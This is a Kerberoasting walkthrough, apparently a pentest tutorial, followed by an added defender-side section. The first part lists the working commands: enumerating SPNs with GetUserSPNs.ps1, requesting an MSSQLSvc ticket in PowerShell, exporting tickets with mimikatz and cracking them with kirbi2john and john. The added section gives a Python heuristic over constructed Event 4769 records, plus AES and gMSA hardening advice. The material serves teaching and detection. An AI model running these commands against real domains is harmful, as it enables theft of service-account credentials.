A service account is a “non-human” account that is used to run services or applications. Service accounts are not administrative accounts, or other “human” accounts, used interactively by administrators or other employees. Service accounts also often have privileged access to computers, applications, and data, which makes them highly valuable to attackers.
Kerberoasting takes advantage of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs).
First we need to find the Service Principal Names using GetUserSPNs.ps1.
.\GetUserSPNs.ps1
We will go for MSSQLSvc.
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/x.y.com:1433"
.\mimikatz.exe
privilege::debug
kerberos::list /export
We've successfully exported the .kirbi files. Grab the MSSQL one and download it to the attacker machine.
We are going to use kirbi2john.py to convert the ticket into a john hash and then crack it with john.
python3 kirbi2john.py -o hash mssql.kirbi
Now the hash is in john format. We can try to crack it.
john hash --wordlist=/home/kali/Downloads/rockyou.txt
john hash --show
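The defender's view of the same activity, as an added example that is not part of the original walkthrough: a Python heuristic run over constructed Windows Security Event ID 4769 ("A Kerberos service ticket was requested") records. The accounts, SPNs and encryption-type values are made up; the field names mirror the 4769 fields TargetUserName, ServiceName and TicketEncryptionType.

```python
# Added example (defender side): spotting Kerberoasting in Windows Security
# Event ID 4769 records. Sample events below are constructed, not real logs.
from collections import defaultdict

RC4_HMAC = "0x17"                 # etype 23: the crackable ticket type a roasting client asks for
AES_ETYPES = {"0x11", "0x12"}     # AES128 / AES256 service tickets

SAMPLE_4769 = [
    {"account": "alice@X.Y.COM", "service": "MSSQLSvc/x.y.com:1433", "etype": "0x17"},
    {"account": "alice@X.Y.COM", "service": "HTTP/web.x.y.com",      "etype": "0x17"},
    {"account": "alice@X.Y.COM", "service": "CIFS/fs01.x.y.com",     "etype": "0x17"},
    {"account": "bob@X.Y.COM",   "service": "MSSQLSvc/x.y.com:1433", "etype": "0x12"},
    {"account": "carol@X.Y.COM", "service": "HTTP/web.x.y.com",      "etype": "0x12"},
    {"account": "carol@X.Y.COM", "service": "MSSQLSvc/x.y.com:1433", "etype": "0x17"},
]

def rc4_spn_bursts(events, min_services=2):
    """Accounts that obtained RC4 service tickets for at least min_services distinct SPNs.
    Requesting tickets for many unrelated services in one go is the volume signature of
    roasting; a real user normally touches only the few services it actually uses."""
    spns = defaultdict(set)
    for ev in events:
        if ev["etype"].lower() == RC4_HMAC:
            spns[ev["account"]].add(ev["service"])
    return {acct: sorted(s) for acct, s in spns.items() if len(s) >= min_services}

def rc4_for_aes_capable_spn(events):
    """(account, service) pairs where an RC4 ticket was issued for a service that is also
    seen issuing AES tickets. The KDC picks the strongest etype common to what the client
    requests and what the service account supports, so an RC4 ticket for an AES-capable
    service means the client asked for RC4 (a roasting tool, or a legacy client to triage).
    This catches the single-SPN request from the walkthrough, which a volume threshold misses."""
    etypes_per_service = defaultdict(set)
    for ev in events:
        etypes_per_service[ev["service"]].add(ev["etype"].lower())
    hits = set()
    for ev in events:
        if ev["etype"].lower() == RC4_HMAC and etypes_per_service[ev["service"]] & AES_ETYPES:
            hits.add((ev["account"], ev["service"]))
    return sorted(hits)

if __name__ == "__main__":
    print("RC4 bursts:", rc4_spn_bursts(SAMPLE_4769))
    print("RC4 tickets for AES-capable services:", rc4_for_aes_capable_spn(SAMPLE_4769))
```

Both heuristics lose their signal once service accounts only issue AES tickets, which is the point: restricting msDS-SupportedEncryptionTypes to AES and giving service accounts long random passwords (or using gMSAs) removes the crackable RC4 ticket the walkthrough depends on.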